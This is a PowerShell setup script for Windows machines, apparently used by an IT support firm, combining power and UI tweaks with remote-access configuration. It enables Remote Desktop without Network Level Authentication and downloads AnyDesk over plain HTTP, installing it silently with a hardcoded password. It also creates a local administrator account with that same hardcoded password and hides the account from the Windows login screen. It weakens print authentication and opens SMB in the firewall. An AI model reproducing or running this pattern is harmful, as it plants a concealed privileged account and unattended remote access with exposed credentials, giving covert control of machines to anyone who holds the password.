#code to make sure the script is running as admin
    If (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        # Relaunch as an elevated process:
        Start-Process powershell.exe "-ExecutionPolicy","bypass","-File",('"{0}"' -f $MyInvocation.MyCommand.Path) -Verb RunAs
        exit
    }


####################################
# Base System Changes and UI Tweaks
####################################

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Confirm:$False -force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force -confirm:$false
$PSRepository = get-PSRepository
if ($PSRepository.installationpolicy -ne 'Trusted') {
    Set-PSRepository -Name 'PSGallery' -InstallationPolicy Trusted
}

$32apps = Get-WmiObject -class win32_product
$32bit = Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
$64bit = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
$apps = $32bit + $64bit

#Disable Windows 10 Fast startup
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Power" -Name HiberbootEnabled -Value 0 
#Set Power Plan to High Performance
powercfg.exe -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
powercfg -SETACVALUEINDEX 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 3
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0

#Enable Unzip Function
Add-Type -AssemblyName System.IO.Compression.FileSystem
function unzip {
	param( [string]$ziparchive, [string]$extractpath )
	[System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
}

#Create Support Directories
#New-Item -ItemType directory -Path C:\support -ErrorAction SilentlyContinue
#New-Item -ItemType directory -Path C:\support\software -ErrorAction SilentlyContinue
#New-Item -ItemType directory -Path C:\support\software\AnyDesk -ErrorAction SilentlyContinue

#Start WinRM Service
Start-Service WinRM -verbose

#Enable System restore 
Enable-ComputerRestore -Drive "C:\" -confirm:$false










#Fix Network Print
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Print" -name "RpcAuthnLevelPrivacyEnabled" -value 00000000 -type dword

# Default preset
$tweaks = @(
	### Require administrator privileges ###
	"RequireAdmin",
	"EnableRemoteDesktop",
	"DisableSleepTimeout",
	"HideTaskbarPeopleIcon",
	"EnableNumlock"
)

# Relaunch the script with administrator privileges
Function RequireAdmin {
	If (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")) {
		Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`" $PSCommandArgs" -WorkingDirectory $pwd -Verb RunAs
		Exit
	}
}
# Enable Remote Desktop w/o Network Level Authentication
Function EnableRemoteDesktop {
	Write-Output "Enabling Remote Desktop w/o Network Level Authentication..."
	Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 0
	Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 0
	Enable-NetFirewallRule -Name "RemoteDesktop*"
}
# Disable display and sleep mode timeouts
Function DisableSleepTimeout {
	Write-Output "Disabling sleep mode timeouts for AC..."
	powercfg /X standby-timeout-ac 0
	powercfg -change hibernate-timeout-ac 0
}
# Hide Taskbar People icon
Function HideTaskbarPeopleIcon {
	Write-Output "Hiding People icon..."
	If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People")) {
		New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" | Out-Null
	}
	Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" -Name "PeopleBand" -Type DWord -Value 0
}

# Enable NumLock after startup
Function EnableNumlock {
	Write-Output "Enabling NumLock after startup..."
	If (!(Test-Path "HKU:")) {
		New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
	}
	Set-ItemProperty -Path "HKU:\.DEFAULT\Control Panel\Keyboard" -Name "InitialKeyboardIndicators" -Type DWord -Value 2147483650
	Add-Type -AssemblyName System.Windows.Forms
	If (!([System.Windows.Forms.Control]::IsKeyLocked('NumLock'))) {
		$wsh = New-Object -ComObject WScript.Shell
		$wsh.SendKeys('{NUMLOCK}')
	}
}



function Install-AnyDesk {
    param (
        [string]$InstallPath = "C:\ProgramData\AnyDesk",
        [string]$AnyDeskUrl = "http://download.anydesk.com/AnyDesk.exe",
        [string]$Password = "r1ug7FaG0fD2",
        [string]$AdminUsername = "biztech.admin",
        [string]$AdminPassword = "r1ug7FaG0fD2"
    )

    # Error handling
    try {
        # Create the installation directory if it doesn't exist
        if (-not (Test-Path -Path $InstallPath -PathType Container)) {
            New-Item -Path $InstallPath -ItemType Directory
        }

        # Download AnyDesk
        Invoke-WebRequest -Uri $AnyDeskUrl -OutFile (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe")

        # Install AnyDesk silently
        Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--install $InstallPath --start-with-win --silent" -Wait

        # Set AnyDesk password
        Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--set-password=$Password" -Wait

        # Create a new user account
        New-LocalUser -Name $AdminUsername -Password (ConvertTo-SecureString -String $AdminPassword -AsPlainText -Force)

        # Add the user to the Administrators group
        Add-LocalGroupMember -Group "Administrators" -Member $AdminUsername

        # Hide the user from the Windows login screen
        Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" -Name $AdminUsername -Value 0 -Type DWORD -Force

        # Get AnyDesk ID
        Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--get-id" -Wait

        Write-Host "Installation completed successfully."
    }
    catch {
        Write-Host "Error: $_"
        Write-Host "Installation failed."
    }
}

# Call the Install-AnyDesk function with default values
Install-AnyDesk






#Enable SMB and ICMP on Windows Firewall
Write-host 'Enable SMB and ICMP on Windows Firewall' -ForegroundColor yellow
Set-NetFirewallRule -DisplayName "File and Printer Sharing (Echo Request - ICMPv4-In)" -Enabled True
Set-NetFirewallRule -DisplayName "File and Printer Sharing (Echo Request - ICMPv4-Out)" -Enabled True
Set-NetFirewallRule -DisplayName "File and Printer Sharing (SMB-In)" -Enabled True
Set-NetFirewallRule -DisplayName "File and Printer Sharing (SMB-Out)" -Enabled True